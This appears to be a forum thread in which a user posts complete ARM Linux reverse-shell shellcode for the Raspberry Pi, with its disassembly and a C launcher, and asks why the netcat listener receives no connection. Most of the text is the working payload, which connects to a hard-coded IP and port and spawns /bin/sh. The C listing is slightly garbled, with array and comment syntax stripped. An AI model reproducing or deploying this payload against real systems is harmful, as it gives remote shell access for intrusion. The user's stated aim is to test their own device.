Forum Thread: Does Anyone Know How to Use This Exploit?

Hi,
I want to use this exploit to test my raspberrypi.
The Problem is that I don't really understand how...
There is no description how to use it:

/*
Title: Linux/ARM - reverse_shell(tcp,10.1.1.2,0x1337)
execve("/bin/sh", 0, 0 vars) - 72 bytes
Date: 2012-09-08
Tested on: ARM1176JZF-S (v6l) - Raspberry Pi
Author: midnitesnake

00008054 <_start>:
8054: e28f1001 add r1, pc, #1
8058: e12fff11 bx r1
805c: 2002 movs r0, #2
805e: 2101 movs r1, #1
8060: 1a92 subs r2, r2, r2
8062: 020f lsls r7, r1, #8
8064: 3719 adds r7, #25
8066: df01 svc 1
8068: 1c06 adds r6, r0, #0
806a: a108 add r1, pc, #32 ; (adr r1,
808c <Dup+0x16>)
806c: 2210 movs r2, #16
806e: 3702 adds r7, #2
8070: df01 svc 1
8072: 273f movs r7, #63 ; 0x3f
8074: 2102 movs r1, #2

00008076 <Dup>:
8076: 1c30 adds r0, r6, #0
8078: df01 svc 1
807a: 3901 subs r1, #1
807c: d5fb bpl.n 8076 <Dup>
807e: a005 add r0, pc, #20 ; (adr r0,
8094 <Dup+0x1e>)
8080: 1a92 subs r2, r2, r2
8082: b405 push {r0, r2}
8084: 4669 mov r1, sp
8086: 270b movs r7, #11
8088: df01 svc 1
808a: 46c0 nop ; (mov r8, r8)
808c: 37130002 .word 0x37130002
8090: 0301010a .word 0x0301010a
8094: 6e69622f .word 0x6e69622f
8098: 0068732f .word 0x0068732f
809c: 00 .byte 0x00
809d: 00 .byte 0x00
809e: 46c0 nop ; (mov r8, r8)
*/
#include <stdio.h>
#include <string.h>

#define SWAP16(x) ((x) << 8 | ((x) >> 8))

const unsigned char sc = {

0x01, 0x10, 0x8F, 0xE2,
0x11, 0xFF, 0x2F, 0xE1,

0x02, 0x20, 0x01, 0x21,
0x92, 0x1a, 0x0f, 0x02,
0x19, 0x37, 0x01, 0xdf,
0x06, 0x1c, 0x08, 0xa1,
0x10, 0x22, 0x02, 0x37,
0x01, 0xdf, 0x3f, 0x27,
0x02, 0x21,

0x30, 0x1c, 0x01, 0xdf,
0x01, 0x39, 0xfb, 0xd5,
0x05, 0xa0, 0x92, 0x1a,
0x05, 0xb4, 0x69, 0x46,
0x0b, 0x27,0x01, 0xdf,
0xc0, 0x46,

/ struct sockaddr /
0x02, 0x00,
/ port: 0x1337 /
0x13, 0x37,
/ ip: 10.1.1.2 /
0x0A, 0x01, 0x01, 0x02,

/ "/bin/sh\0" /
0x2f, 0x62, 0x69, 0x6e,0x2f, 0x73, 0x68, 0x00
};

int main()
{
printf("shellcode=%d bytes\n"
"connecting to %d.%d.%d.%d:%hd\n", sizeof sc,
sc0x3c, sc0x3d, sc0x3e, sc0x3f,
SWAP16(((unsigned short )(sc+0x3a))));
return ((int (*)(void))sc)();
}
Also I tried to run the code on both machines, the RPi and my common pc.
It is only running on the Raspberry-Pi so I guess it has to be run there.
I converted the IP of my common PC into HEX and replaced it with the one in the code.
Then i started with netcat a listener on Port 4919(0x1337) and started the Programm on the RPi.
But nothing happens :/ the Programm on the Pi tries to connect to the given IP-address but is unsuccesfull...
Do I have to use a different listener?
The file is a .asm file.
which confuses me even more, because it is not written in assembly, so i compiled it with gcc.
It would be great if one of you knew a solution.

2 Responses

Why are you trying to use this specific exploit?

I found it with searchsploit and it was the most-fitting.
I don't have to use exactly this one, but I'm also interested in how to use it.
I'd like to be able to use all kinds of exploits.

Share Your Thoughts

  • Hot
  • Active